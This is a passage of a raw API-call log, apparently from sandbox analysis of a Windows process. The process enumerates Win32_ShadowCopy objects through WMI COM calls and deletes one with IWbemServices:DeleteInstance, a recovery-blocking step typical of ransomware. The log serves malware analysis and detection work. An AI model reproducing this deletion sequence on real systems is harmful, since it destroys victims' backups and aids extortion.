This=0x1be55590, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be55590) returned 0x0 [0122.387] IUnknown:QueryInterface (in: This=0x1be55590, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0122.387] IUnknown:QueryInterface (in: This=0x1be55590, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0122.387] IUnknown:AddRef (This=0x1be55590) returned 0x3 [0122.387] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0122.387] IUnknown:QueryInterface (in: This=0x1be55590, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be55598) returned 0x0 [0122.388] IMarshal:GetUnmarshalClass (in: This=0x1be55598, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.388] IUnknown:Release (This=0x1be55598) returned 0x3 [0122.388] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0122.388] IUnknown:AddRef (This=0x1be55590) returned 0x4 [0122.388] IUnknown:QueryInterface (in: This=0x1be55590, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0122.388] IUnknown:Release (This=0x1be55590) returned 0x3 [0122.388] IUnknown:Release (This=0x1be55590) returned 0x2 [0122.388] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0122.389] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0122.389] IUnknown:AddRef (This=0x1be55590) returned 0x3 [0122.389] IUnknown:QueryInterface (in: This=0x1be55590, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be55590) returned 0x0 [0122.389] IUnknown:Release (This=0x1be55590) returned 0x3 [0122.389] IUnknown:Release (This=0x1be55590) returned 0x2 [0122.389] IUnknown:Release (This=0x1be55590) returned 0x1 [0122.389] CoTaskMemFree (pv=0x16a900) [0122.389] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0122.389] IUnknown:AddRef (This=0x1be55590) returned 0x2 [0122.389] IWbemClassObject:Get (in: This=0x1be55590, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0122.390] IWbemClassObject:Get (in: This=0x1be55590, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0122.390] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x53 [0122.390] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0122.390] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0122.390] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0122.390] IUnknown:Release (This=0x142498) returned 0x1 [0122.391] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51da0) returned 0x0 [0122.391] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51da0, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0122.392] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51da0, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52b90) returned 0x0 [0122.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52b90) returned 0x0 [0122.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: ppvObject=0x1c90cfd0*=0x0) returned 0x80004002 [0122.392] WbemDefPath:IUnknown:AddRef (This=0x1be52b90) returned 0x3 [0122.393] CoGetContextToken (in: pToken=0x1c90cc20 | out: pToken=0x1c90cc20) returned 0x0 [0122.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cbe0 | out: ppvObject=0x1c90cbe0*=0x1b9368e0) returned 0x0 [0122.393] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b9368e0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90cc10 | out: pCid=0x1c90cc10*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.393] WbemDefPath:IUnknown:Release (This=0x1b9368e0) returned 0x3 [0122.393] CoGetContextToken (in: pToken=0x1c90cbf0 | out: pToken=0x1c90cbf0) returned 0x0 [0122.393] WbemDefPath:IUnknown:AddRef (This=0x1be52b90) returned 0x4 [0122.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cd08 | out: ppvObject=0x1c90cd08*=0x0) returned 0x80004002 [0122.393] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x3 [0122.394] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x2 [0122.394] WbemDefPath:IUnknown:Release (This=0x1be51da0) returned 0x0 [0122.394] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x1 [0122.394] CoGetContextToken (in: pToken=0x1c90d920 | out: pToken=0x1c90d920) returned 0x0 [0122.394] CoGetContextToken (in: pToken=0x1c90d860 | out: pToken=0x1c90d860) returned 0x0 [0122.394] WbemDefPath:IUnknown:AddRef (This=0x1be52b90) returned 0x2 [0122.394] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x1c90d9a0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90d980 | out: ppvObject=0x1c90d980*=0x1be52b90) returned 0x0 [0122.395] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x2 [0122.395] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x1 [0122.395] CoGetContextToken (in: pToken=0x1c90daa0 | out: pToken=0x1c90daa0) returned 0x0 [0122.395] CoGetContextToken (in: pToken=0x1c90d9e0 | out: pToken=0x1c90d9e0) returned 0x0 [0122.395] WbemDefPath:IUnknown:AddRef (This=0x1be52b90) returned 0x2 [0122.395] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52b90, riid=0x1c90db20*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c90db00 | out: ppvObject=0x1c90db00*=0x1be52b90) returned 0x0 [0122.395] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x2 [0122.395] WbemDefPath:IUnknown:AddRef (This=0x1be52b90) returned 0x3 [0122.395] WbemDefPath:IWbemPath:SetText (This=0x1be52b90, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0122.395] WbemDefPath:IUnknown:Release (This=0x1be52b90) returned 0x2 [0122.396] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90dd60 | out: puCount=0x1c90dd60*=0x2) returned 0x0 [0122.396] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c90dd60*=0x17, pszText=0x0) returned 0x0 [0122.396] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90dd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90dd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.396] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0122.396] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0122.396] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.397] IWbemClassObject:Get (in: This=0x1be55590, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0122.397] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.397] IWbemClassObject:Get (in: This=0x1be55590, wszName="__NAMESPACE", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="root\\cimv2", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0122.397] SysStringLen (param_1="root\\cimv2") returned 0xa [0122.397] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d800 | out: puCount=0x1c90d800*=0x2) returned 0x0 [0122.397] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d800*=0x17, pszText=0x0) returned 0x0 [0122.397] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d800*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d800*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.397] IWbemClassObject:Get (in: This=0x1be55590, wszName="__CLASS", lFlags=0, pVal=0x1c90d7f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7ec*=0, plFlavor=0x1c90d7e8*=0 | out: pVal=0x1c90d7f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7ec*=8, plFlavor=0x1c90d7e8*=64) returned 0x0 [0122.397] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0122.397] IWbemClassObject:Get (in: This=0x1be55590, wszName="__CLASS", lFlags=0, pVal=0x1c90d800*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64 | out: pVal=0x1c90d800*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ShadowCopy", varVal2=0x0), pType=0x1c90d7fc*=8, plFlavor=0x1c90d7f8*=64) returned 0x0 [0122.397] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0122.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be52b90, puCount=0x1c90d500 | out: puCount=0x1c90d500*=0x2) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x1be52b90, lFlags=4, puBuffLength=0x1c90d500*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d500*=0x54, pszText=0x0) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x1be52b90, lFlags=4, puBuffLength=0x1c90d500*=0x54, pszText="00000000000000000000000000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d500*=0x54, pszText="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1be31390, puCount=0x1c90d450 | out: puCount=0x1c90d450*=0x2) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d450*=0x17, pszText=0x0) returned 0x0 [0122.398] WbemDefPath:IWbemPath:GetText (in: This=0x1be31390, lFlags=4, puBuffLength=0x1c90d450*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c90d450*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0 [0122.398] CoGetContextToken (in: pToken=0x1c90d2e0 | out: pToken=0x1c90d2e0) returned 0x0 [0122.398] WbemLocator:IUnknown:AddRef (This=0x1b92e6f0) returned 0x3 [0122.398] WbemLocator:IUnknown:QueryInterface (in: This=0x1b92e6f0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90ceb0 | out: ppvObject=0x1c90ceb0*=0x1b92e6f0) returned 0x0 [0122.398] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x3 [0122.399] WbemLocator:IUnknown:Release (This=0x1b92e6f0) returned 0x2 [0122.399] IWbemClassObject:Get (in: This=0x1be55590, wszName="__GENUS", lFlags=0, pVal=0x1c90d440*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90d43c*=0, plFlavor=0x1c90d438*=0 | out: pVal=0x1c90d440*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90d43c*=3, plFlavor=0x1c90d438*=64) returned 0x0 [0122.399] WbemDefPath:IWbemPath:GetText (in: This=0x1be52b90, lFlags=2, puBuffLength=0x1c90d510*=0x0, pszText=0x0 | out: puBuffLength=0x1c90d510*=0x3d, pszText=0x0) returned 0x0 [0122.399] WbemDefPath:IWbemPath:GetText (in: This=0x1be52b90, lFlags=2, puBuffLength=0x1c90d510*=0x3d, pszText="000000000000000000000000000000000000000000000000000000000000" | out: puBuffLength=0x1c90d510*=0x3d, pszText="Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"") returned 0x0 [0122.399] IWbemServices:DeleteInstance (in: This=0x1be444f8, strObjectPath="Win32_ShadowCopy.ID=\"{2C8AB63D-F2CE-4F84-96CE-B33DC539136D}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0124.723] CoTaskMemAlloc (cb=0x8) returned 0x16a900 [0124.723] IEnumWbemClassObject:Next (in: This=0x1be44788, lTimeout=-1, uCount=0x1, apObjects=0x16a900, puReturned=0x1c90de18 | out: apObjects=0x16a900*=0x1be55c30, puReturned=0x1c90de18*=0x1) returned 0x0 [0124.724] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d140 | out: ppvObject=0x1c90d140*=0x1be55c30) returned 0x0 [0124.725] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90d1c0 | out: ppvObject=0x1c90d1c0*=0x0) returned 0x80004002 [0124.725] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x7fef2d6d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90cf58 | out: ppvObject=0x1c90cf58*=0x0) returned 0x80004002 [0124.725] IUnknown:AddRef (This=0x1be55c30) returned 0x3 [0124.725] CoGetContextToken (in: pToken=0x1c90ce10 | out: pToken=0x1c90ce10) returned 0x0 [0124.725] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x7fef2d6d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cdd0 | out: ppvObject=0x1c90cdd0*=0x1be55c38) returned 0x0 [0124.726] IMarshal:GetUnmarshalClass (in: This=0x1be55c38, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c90ce00 | out: pCid=0x1c90ce00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0124.726] IUnknown:Release (This=0x1be55c38) returned 0x3 [0124.726] CoGetContextToken (in: pToken=0x1c90cde0 | out: pToken=0x1c90cde0) returned 0x0 [0124.726] IUnknown:AddRef (This=0x1be55c30) returned 0x4 [0124.726] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x7fef2d6d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cef8 | out: ppvObject=0x1c90cef8*=0x0) returned 0x80004002 [0124.726] IUnknown:Release (This=0x1be55c30) returned 0x3 [0124.726] IUnknown:Release (This=0x1be55c30) returned 0x2 [0124.726] CoGetContextToken (in: pToken=0x1c90d2a0 | out: pToken=0x1c90d2a0) returned 0x0 [0124.727] CoGetContextToken (in: pToken=0x1c90d1e0 | out: pToken=0x1c90d1e0) returned 0x0 [0124.727] IUnknown:AddRef (This=0x1be55c30) returned 0x3 [0124.727] IUnknown:QueryInterface (in: This=0x1be55c30, riid=0x1c90d320*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c90d300 | out: ppvObject=0x1c90d300*=0x1be55c30) returned 0x0 [0124.727] IUnknown:Release (This=0x1be55c30) returned 0x3 [0124.727] IUnknown:Release (This=0x1be55c30) returned 0x2 [0124.727] IUnknown:Release (This=0x1be55c30) returned 0x1 [0124.727] CoTaskMemFree (pv=0x16a900) [0124.727] CoGetContextToken (in: pToken=0x1c90dc20 | out: pToken=0x1c90dc20) returned 0x0 [0124.727] IUnknown:AddRef (This=0x1be55c30) returned 0x2 [0124.728] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__GENUS", lFlags=0, pVal=0x1c90dd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd8c*=0, plFlavor=0x1c90dd88*=0 | out: pVal=0x1c90dd90*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c90dd8c*=3, plFlavor=0x1c90dd88*=64) returned 0x0 [0124.728] IWbemClassObject:Get (in: This=0x1be55c30, wszName="__PATH", lFlags=0, pVal=0x1c90dd30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c90dd2c*=0, plFlavor=0x1c90dd28*=0 | out: pVal=0x1c90dd30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"", varVal2=0x0), pType=0x1c90dd2c*=8, plFlavor=0x1c90dd28*=64) returned 0x0 [0124.728] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_ShadowCopy.ID=\"{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}\"") returned 0x53 [0124.728] CoGetObjectContext (in: riid=0x1c90dcc8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90dcc0 | out: ppv=0x1c90dcc0*=0x142498) returned 0x0 [0124.728] IComThreadingInfo:GetCurrentApartmentType (in: This=0x142498, pAptType=0x1c90dce0 | out: pAptType=0x1c90dce0*=1) returned 0x0 [0124.728] IUnknown:QueryInterface (in: This=0x142498, riid=0x30db210*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c90dde8 | out: ppvObject=0x1c90dde8*=0x0) returned 0x80004002 [0124.728] IUnknown:Release (This=0x142498) returned 0x1 [0124.729] CoGetClassObject (in: rclsid=0x1b90a7f8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef2d6d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c90d350 | out: ppv=0x1c90d350*=0x1be51e60) returned 0x0 [0124.729] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be51e60, riid=0x7fef2d6d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c90d060 | out: ppvObject=0x1c90d060*=0x0) returned 0x80004002 [0124.730] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1be51e60, pUnkOuter=0x0, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90d048 | out: ppvObject=0x1c90d048*=0x1be52c50) returned 0x0 [0124.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x7fef2d6d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c90cf50 | out: ppvObject=0x1c90cf50*=0x1be52c50) returned 0x0 [0124.730] WbemDefPath:IUnknown:QueryInterface (in: This=0x1be52c50, riid=0x7fef2d6d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c90cfd0 | out: 